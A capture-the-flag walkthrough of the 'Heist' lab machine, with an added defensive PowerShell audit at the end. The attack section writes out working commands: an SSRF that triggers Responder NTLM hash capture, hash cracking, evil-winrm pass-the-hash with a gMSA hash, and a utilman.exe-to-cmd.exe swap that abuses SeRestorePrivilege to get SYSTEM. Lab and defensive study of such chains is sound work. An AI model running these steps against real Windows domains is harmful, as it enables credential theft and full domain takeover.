Heist
The initial foothold was capturing NTLM credentials with Responder.
nmap 192.168.235.172

rustscan --addresses 192.168.235.165 --ulimit 5000 -- -A -sC -Pn -sV -T4
enum4linux 192.168.235.172

nmap 192.168.235.165 -sVC -A -p- --min-rate 10000


Port 53/tcp: Simple DNS Plus.
Port 88/tcp: Microsoft Windows Kerberos.
Port 135/tcp: Microsoft Windows RPC.
Ports 139/tcp and 445/tcp: Microsoft Windows NetBIOS and SMB (Microsoft Directory Services).
Ports 389/tcp and 3268/tcp: Active Directory LDAP (3268 is the Global Catalog).
Port 464/tcp: kpasswd5, the Kerberos password-change service.
Port 593/tcp: Microsoft Windows RPC over HTTP.
Port 636/tcp: LDAP over SSL/TLS (LDAPS).
Port 3269/tcp: Global Catalog over SSL/TLS, the secured counterpart of 3268/tcp.
Port 3389/tcp: Microsoft Terminal Services (RDP). The SSL certificate and RDP NTLM info identify the target as a Windows host named "DC01" in the "HEIST" domain.
Port 8080/tcp: Werkzeug HTTP server 2.0.1 with Python 3.9.0, hosting a web application titled "Super Secure Web Browser".
Added records for heist.offsec and dc01.heist.offsec to the /etc/hosts file.
Try port 8080.

Then, after starting a Python http.server on port 80, I entered my own URL in the site's search bar: the application fetched it, the directory listing was rendered, and the request from the target showed up in my http.server terminal.

Now, if I start Responder on my VPN interface tun0 and make the application visit my IP, let's see what we get. We can also try ntlm_theft - https://github.com/Greenwolf/ntlm_theft
responder -wv -I tun0

I got the NTLM hash of a user named enox.

I saved the hash to hash.txt and tried to crack it with john.
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
evil-winrm -i 192.168.235.165 -u enox -p california
Using this credential, I got access with evil-winrm.

Now, searching for txt files, I found 2 files.

net users

whoami /priv

bloodhound-python -d heist.offsec -u enox -p california -v --zip -dc heist.offsec -c all -ns 192.168.235.165
(this was NOT working)
bloodhound-python -d heist.offsec -u enox -p california -v --zip -dc DC01.heist.offsec -c all -ns 192.168.120.165

crackmapexec smb 192.168.226.165

crackmapexec winrm dc01

I'll continue with evil-winrm.


git clone https://github.com/itm4n/PrivescCheck

Upload the script through the evil-winrm upload command:
upload PrivescCheck.ps1
PS C:\Users\enox\Documents> . .\PrivescCheck.ps1;Invoke-PrivescCheck -Extended

Privilege Escalation
Option 1:
Download GMSAPasswordReader.exe to the local Kali machine, then upload it to the Heist machine.

.\GMSAPasswordReader.exe --accountname svc_apache

We've obtained the NTLM hash (rc4_hmac) of svc_apache$.

Try logging in with evil-winrm using the new hash; it works.
This is the shortest path to domain admin from the owned account, and luckily SVC_APACHE$ can use PS remoting to access the computer. Let's use Evil-WinRM with it.
rc4_hmac : CAC8E7C043BE5FA304438E362909B953
evil-winrm -i 192.168.167.165 -u svc_apache$ -H CAC8E7C043BE5FA304438E362909B953

Let us pass our tools directory with -s:
evil-winrm -i 192.168.167.165 -u svc_apache$ -H CAC8E7C043BE5FA304438E362909B953 -s /root/machines/OSCPTools/Toolies/
We can then view the directory.

Now that we have svc_apache$, we'll see what privileges it possesses and what actions it can perform.

It's been suggested that we could attempt DCSync to escalate privileges to the domain admin level. However, since we're not an Administrator, we won't be able to execute it successfully; we won't have the privilege to use Mimikatz.
Getting Root

This was new information to me: it turns out SeRestorePrivilege is also considered dangerous, because it allows writing to files the account otherwise could not touch.

Now move to system32, where that privilege lets us rename the protected binaries:
Evil-WinRM PS C:\Users\svc_apache$\Documents> cd c:\windows\system32
Evil-WinRM PS C:\windows\system32> mv utilman.exe utilman.old
Evil-WinRM PS C:\windows\system32> mv cmd.exe utilman.exe

For step 5, we need to "Lock the console and press Win+U".
rdesktop 192.168.167.165


Now I pressed Win+U and a command prompt appeared.

I found I now have cmd as NT AUTHORITY\SYSTEM.
From the Administrator's Desktop I found the proof flag.
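As an added defender-side check (not part of the original writeup), the following PowerShell audits the three weaknesses this chain relied on: a gMSA whose password a low-privileged account can read, SeRestorePrivilege granted beyond the built-in groups, and utilman.exe in System32 replaced by cmd.exe. It assumes the ActiveDirectory module is installed and that it runs on DC01 or a domain-joined admin host; the names svc_apache and utilman.exe come from the writeup.

```powershell
# Added defender check (not from the original writeup). Assumes the ActiveDirectory
# module is present and the script runs on the DC or a domain-joined admin host.
Import-Module ActiveDirectory

# 1. Who is allowed to read the svc_apache$ gMSA password? Only the intended
#    computer accounts or a tightly scoped group should be listed; a user such as
#    enox appearing here (directly or via group membership) is the finding.
$gmsa = Get-ADServiceAccount -Identity 'svc_apache' `
            -Properties PrincipalsAllowedToRetrieveManagedPassword
Write-Host 'Principals allowed to retrieve the svc_apache$ password:'
foreach ($dn in $gmsa.PrincipalsAllowedToRetrieveManagedPassword) {
    Get-ADObject -Identity $dn -Properties sAMAccountName, objectClass |
        Select-Object sAMAccountName, objectClass
}

# 2. Which principals hold SeRestorePrivilege on this host? secedit exports the
#    user-rights assignment as SIDs; anything beyond the built-in operator and
#    administrator groups (a service account, for instance) needs review.
$cfg = Join-Path $env:TEMP 'rights.inf'
secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null
Select-String -Path $cfg -Pattern '^SeRestorePrivilege' | ForEach-Object { $_.Line }
Remove-Item $cfg -ErrorAction SilentlyContinue

# 3. Has utilman.exe been swapped for cmd.exe? A renamed cmd.exe still carries a
#    valid catalog signature, so compare hashes instead of trusting the signature
#    status alone. The same check applies to the other lock-screen helpers.
$sys32   = Join-Path $env:SystemRoot 'System32'
$utilman = Join-Path $sys32 'utilman.exe'
$cmdHash = (Get-FileHash -Path (Join-Path $sys32 'cmd.exe') -Algorithm SHA256).Hash
$utlHash = (Get-FileHash -Path $utilman -Algorithm SHA256).Hash
$sig     = Get-AuthenticodeSignature -FilePath $utilman
if ($utlHash -eq $cmdHash) {
    Write-Warning 'utilman.exe is byte-identical to cmd.exe: accessibility binary replaced'
} elseif ($sig.Status -ne 'Valid') {
    Write-Warning "utilman.exe signature status: $($sig.Status)"
} else {
    Write-Host "utilman.exe OK, signed by $($sig.SignerCertificate.Subject)"
}
# A leftover utilman.old (the renamed original) is a second indicator.
Get-ChildItem -Path $sys32 -Filter 'utilman.old' -ErrorAction SilentlyContinue |
    Select-Object FullName, LastWriteTime
```

Run it from an elevated PowerShell session; the gMSA query needs RSAT, and step 3 must run on the host being checked.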
